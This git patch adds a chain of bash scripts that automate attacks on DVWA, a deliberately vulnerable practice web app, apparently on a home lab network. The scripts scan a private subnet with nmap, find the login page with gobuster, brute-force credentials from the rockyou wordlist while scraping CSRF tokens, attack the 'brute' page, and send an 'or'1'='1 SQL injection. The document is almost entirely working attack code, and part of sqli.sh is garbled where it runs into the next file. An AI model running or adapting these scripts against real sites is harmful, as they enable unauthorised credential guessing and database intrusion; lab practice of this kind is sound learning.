From 449164ff4366a9a4b74070724221b8e964263756 Mon Sep 17 00:00:00 2001 From: "Samuel Huntley (huntleys)" Date: Wed, 29 Apr 2020 23:52:43 +0100 Subject: [PATCH] Add files via upload --- bruteForce.sh | 71 +++++++++++++++++++++++++++++++++++++++++++++++++++ bruteLogin.sh | 60 +++++++++++++++++++++++++++++++++++++++++++ init.sh | 18 +++++++++++++ scanInit.sh | 33 ++++++++++++++++++++++++ sqli.sh | 43 +++++++++++++++++++++++++++++++ vulnId.sh | 37 +++++++++++++++++++++++++++ 6 files changed, 262 insertions(+) create mode 100644 bruteForce.sh create mode 100644 bruteLogin.sh create mode 100644 init.sh create mode 100644 scanInit.sh create mode 100644 sqli.sh create mode 100644 vulnId.sh diff --git a/bruteForce.sh b/bruteForce.sh new file mode 100644 index 0000000..ef0f485 --- /dev/null +++ b/bruteForce.sh @@ -0,0 +1,71 @@ +#vulnId.sh --> bruteForce.sh + +echo -e "\n---- Starting Brute Force on brute vulnerability ----" +sleep 3s + +## Variables +LOGIN_URL=$LOGIN_URL +BRUTE_DIR=$BRUTE_DIR +#USER and PASS found from bruteLogin.sh +DVWA_USER=$DVWA_USER +DVWA_PASS=$DVWA_PASS + +#DVWA_USER='admin' +#DVWA_PASS='password' + +USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" +PASS_LIST="/usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt" + +## Value to look for in response in webpage source code +SUCCESS="Welcome to the password protected area $DVWA_USER" + +## Anti CSRF token +CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )" +sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie + +## Login to DVWA using cookie +curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null +[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1 + +## Counter +i=0 + +## Password loop +while read -r _PASS; do + + ## Username loop + while read -r _USER; do + + ## Increase counter + ((i=i+1)) + + ## Display USER:PASS attempts to user + #echo "Try ${i}: ${_USER} : ${_PASS}" + + ## Connect to web server + REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "$BRUTE_DIR/?username=${_USER}&password=${_PASS}&Login=Login" )" + [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2' + + ## Check response against SUCCESS string + echo "${REQUEST}" | grep -q "${SUCCESS}" + if [[ "$?" -eq 0 ]]; then + ## Success! + echo -e "\nFound at Try: ${i}" + echo "Username: ${_USER}" + echo "Password: ${_PASS}" + + #echo "${REQUEST}" + echo "$SUCCESS" + sleep 3s + break 2 + fi + + done < ${USER_LIST} +done < ${PASS_LIST} + +## Clean up +#rm -f /tmp/dvwa.cookie + +export COUNT=2 + +/bin/bash ~/Documents/DVWA/scripts/vulnId.sh diff --git a/bruteLogin.sh b/bruteLogin.sh new file mode 100644 index 0000000..c5f7619 --- /dev/null +++ b/bruteLogin.sh @@ -0,0 +1,60 @@ +#scanInit.sh --> bruteLogin.sh + +echo -e " \n---- Starting Brute force on Login Page ---- " + +## Variables +export LOGIN_URL=$LOGIN_URL +USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" +PASS_LIST="/usr/share/seclists/Passwords/rockyou.txt" +export IP=$INIT_IP + +## Value to look for in response +SUCCESS="Location: index.php" + +## Counter +i=0 + +## Password loop +while read -r _PASS; do + + ## Username loop + while read -r _USER; do + + ## Increase counter + ((i=i+1)) + + ## Display USER:PASS attempts to user + ## Comment out for less noise + #echo "Try ${i}: ${_USER} : ${_PASS}" + + ## Connect to web server + CSRF=$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie $LOGIN_URL | awk -F 'value=' '/user_token/ {print $2}' | awk -F "'" '{print $2}' ) + + REQUEST="$( curl -sib ~/Documents/DVWA/scripts/dvwa.cookie --data "username=${_USER}&password=${_PASS}&user_token=${CSRF}&Login=Login" $LOGIN_URL )" + [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2' + + ## Check response against SUCCESS string + echo "${REQUEST}" | grep -q "${SUCCESS}" + if [[ "$?" -eq 0 ]]; then + ## Success! + echo -e "\nFound at Try ${i}:\nUsername:${_USER}\nPassword:${_PASS}" + sleep 3s + + #export credential variables to use in next script + export USER="$(echo "${_USER}")" + export PASS="$(echo "${_PASS}")" + + break 2 + fi + + done < ${USER_LIST} +done < ${PASS_LIST} + +## Clean up +rm -f ~/Documents/DVWA/scripts/dvwa.cookie + +#Create counter for next script +export COUNT=1 + +#Call next script +/bin/bash ~/Documents/DVWA/scripts/vulnId.sh diff --git a/init.sh b/init.sh new file mode 100644 index 0000000..095d718 --- /dev/null +++ b/init.sh @@ -0,0 +1,18 @@ +##init.sh + +##Force no internet +#nmcli networking off + +##Check for internet connection +wget -q --spider http://google.com +if [ $? -eq 0 ]; then + echo "Online" + echo -e "---- Starting Network scans ---- \n " + /bin/bash ~/Documents/DVWA/scripts/scanInit.sh +else + echo "No network connection" + echo "quitting" + exit +fi + + diff --git a/scanInit.sh b/scanInit.sh new file mode 100644 index 0000000..aaeab1a --- /dev/null +++ b/scanInit.sh @@ -0,0 +1,33 @@ +#init.sh --> scanInit.sh + +##Variables +##export local IP +#export INIT_IP=$(ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' + +#Get all IP's and HTTP ports on network +nmap -T4 -Pn 192.168.40.141/24 | grep -E 'http|([0-9]{1,3}[\.]){3}[0-9]{1,3}' | grep -v https > tmp.txt + +#Get HTTP ip address +export INIT_IP=$(cat tmp.txt | grep 'http' -B 1 | grep -Eo '([0-9]{1,3}[\.]){3}[0-9]{1,3}') +#Get HTTP port +HTTP_PORT=$(cat tmp.txt | grep http | sed 's/[^0-9]*//g') + +#rm tmp.txt + +#HTTP_PORT=80 + +echo "IP address: $INIT_IP" +echo "HTTP port number: $HTTP_PORT" +export WORD_LIST="/usr/share/dirb/wordlists/common.txt" + +#Create variable for the Login URL using the IP and open port number +export LOGIN_URL=$(gobuster dir -u "$INIT_IP:$HTTP_PORT/DVWA/" -nqelw $WORD_LIST -x php | grep login | grep -o '^\S*') + +echo "Full Login URL: $LOGIN_URL" + +sleep 3s + +#Call next script (Brute Forcing the login page) +/bin/bash ~/Documents/DVWA/scripts/bruteLogin.sh + + diff --git a/sqli.sh b/sqli.sh new file mode 100644 index 0000000..816767a --- /dev/null +++ b/sqli.sh @@ -0,0 +1,43 @@ +#vulnId.sh --> sqli.sh + +#Variables +#URL=$URL +IP=$IP +SQLI_DIR=$SQLI_DIR'/' +SQLI_1=' or '1'='1 +EXT='?id=1&Submit=Submit' +LOGIN_URL="http://192.168.40.145/DVWA/login.php/" +DVWA_USER=$USER +DVWA_PASS=$PASS + +#sqlmap -u "${SQLI_DIR}?id=&Submit=Submit" --cookie="PHPSESSID=96uqh3mj23mg50vnn2uadsj5rj;security=low" --batch --drop-set-cookie + +## Anti CSRF token +CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )" +sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie + +## Login to DVWA using cookie +curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null +[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1 + +## Connect to server using cookie + REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?username=${DVWA_USER}&password=${DVWA_PASS}&Login=login${EXT}" )" + [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2' + +#Display Success +echo "${REQUEST}" | grep "Vulnerability: SQL Injection" | sed -e 's/^[ \t]*//' + +#Attempt SQLi with DVWA'or'1'='1 +echo -e "\n---- Attempting SQLi using DVWA'or'1'='1 ----\n" +TEST1="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?id=DVWA'or'1'='1&Submit=Submit" )" + [[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2' + +#Format output +echo "${TEST1}" | grep -o -P '(?<=pre).*(?=pre)' | sed -e 's/
/\\\n/g' -e 's/\\/ /g' -e 's/[/>]//g' -e 's/ vulnId.sh
+#bruteForce.sh --> vulnId.sh
+
+##Variables
+#export URL="http://192.168.40.145/DVWA/vulnerabilities"
+WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+EXT="/DVWA/vulnerabilities"
+COUNT=$COUNT
+#export COUNT=$COUNT
+export DVWA_USER=$USER
+export DVWA_PASS=$PASS
+export LOGIN_URL=$LOGIN_URL
+export IP=$IP
+
+case $COUNT in 
+	1)	
+        #dirb on DVWA home page to find brute vulnerability directory
+        echo -e "\n---- Finding brute force directory ----\n"        
+	export BRUTE_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/brute ' | grep -o '^\S*')        
+	echo -e "Directory with brute vulnerability: $BRUTE_DIR"
+        sleep 5s
+        /bin/bash ~/Documents/DVWA/scripts/bruteForce.sh
+        ;;
+        2)
+	#find sqli vulnerability directory
+        echo -e "\n---- Finding SQL injection directory ----\n"        
+	export SQLI_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/sqli ' | grep -o '^\S*')
+        echo -e "Directory with sqli vulnerability: $SQLI_DIR \n"
+        sleep 5s
+        /bin/bash ~/Documents/DVWA/scripts/sqli.sh
+        ;; 
+        3) 
+        rm tmp.txt
+	rm dvwa.cookie
+	;;
+        *)
+esac